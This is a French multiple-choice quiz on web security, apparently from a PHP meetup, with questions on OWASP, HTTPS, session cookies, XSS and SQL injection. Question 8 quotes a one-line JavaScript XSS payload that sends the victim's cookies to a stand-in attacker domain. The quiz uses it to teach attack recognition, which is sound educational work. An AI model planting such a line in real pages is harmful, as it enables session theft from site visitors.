PHP Tours Meetup #27 Sécurité et vulnérabilités Web

PHP Tours Meetup #27 Sécurité et vulnérabilités Web

University - Professional Development

9 Qs

quiz-placeholder

Similar activities

Modulo 3. Interconexión de dispositivos

Modulo 3. Interconexión de dispositivos

University

10 Qs

MT_Chapter 5 & 6 (set 2)

MT_Chapter 5 & 6 (set 2)

University

10 Qs

AMS - Aula 03

AMS - Aula 03

University

10 Qs

ELEMENTOS BÁSICOS DE UN PROYECTO DE INVERSIÓN - GRUPO 4

ELEMENTOS BÁSICOS DE UN PROYECTO DE INVERSIÓN - GRUPO 4

University

11 Qs

INTRODUCCION A LA PROGRAMACION

INTRODUCCION A LA PROGRAMACION

6th Grade - University

10 Qs

GIT COURSE

GIT COURSE

University

13 Qs

Testeo de equipos - BIOS

Testeo de equipos - BIOS

University

10 Qs

Intro Visualizacion de datos 2 Percepción

Intro Visualizacion de datos 2 Percepción

Professional Development

14 Qs

PHP Tours Meetup #27 Sécurité et vulnérabilités Web

PHP Tours Meetup #27 Sécurité et vulnérabilités Web

Assessment

Quiz

Computers

University - Professional Development

Medium

Created by

Tours AFUP

Used 4+ times

FREE Resource

AI

Enhance your content in a minute

Add similar questions
Adjust reading levels
Convert to real-world scenario
Translate activity
More...

9 questions

Show all answers

1.

MULTIPLE CHOICE QUESTION

30 sec • Ungraded

(Question Gratuite) A propos de la conférence de ce soir:

J'ai appris beaucoup de choses cools!

Ca m'a permis de réviser mes connaisances!

Je connaissais déjà tout!

Je viens voir les organisateurs pour faire la prochaine conférence sur la sécurité!

2.

MULTIPLE CHOICE QUESTION

30 sec • 1 pt

Que signifie l'acronyme "OWASP" ?

Organisation for World Acknowledgment of Security Principle

Of Web And Security Policy

Open Web Application Security Project

Omega Werewolf And the Super Poney

3.

MULTIPLE CHOICE QUESTION

30 sec • 1 pt

Quelle est la catégorie placée en haut du TOP 10 de l'OWASP (version 2021) ?

Contrôles d'accès défaillants

Mauvaise configuration de sécurité

Identification et authentification de mauvaise qualité

Supervision et Journalisation Insuffisantes

4.

MULTIPLE CHOICE QUESTION

20 sec • 1 pt

Si je navigue sur un site en HTTPS je suis 100% à l'abri de tout piratage.

Vrai

Faux

5.

MULTIPLE CHOICE QUESTION

20 sec • 1 pt

Il peut suffire d'un cookie de session pour accéder au compte d'une personne sans connaître ses identifiants (login/mot de passe)

Vrai

Faux

6.

MULTIPLE CHOICE QUESTION

30 sec • 1 pt

Laquelle de ces mesures N'aiderait PAS à limiter la possibilité d'un vol de cookie ?

Utiliser l'attribut "HttpOnly"

Limiter la durée de vie des cookies

Filtrer les données soumises par les utilisateurs avant de les stocker

Imposer un changement de mot de passe tous les mois

7.

MULTIPLE CHOICE QUESTION

20 sec • 1 pt

Il n'y a que par le biais des sites Web que l'ont peut se faire pirater

Vrai

Faux

8.

MULTIPLE CHOICE QUESTION

30 sec • 1 pt

> (new Image()).src = "http://www.evil-domain.com/steal-cookie.php?cookie=" + document.cookie;

La ligne de code ci-dessus est typique d'une attaque de type:

Injection SQL

Cross-site scripting (XSS)

Brute force

Man in the middle

9.

MULTIPLE CHOICE QUESTION

30 sec • Ungraded

Quelle est, pour vous, la meilleure proposition pour éviter les failles de type "injection SQL" ?

Utiliser une base NoSQL

Ne pas mettre de formulaire sur son site

Utiliser un ORM pour gérer les requêtes à la base

Venir aux meetup de l'AFUP sur la sécurité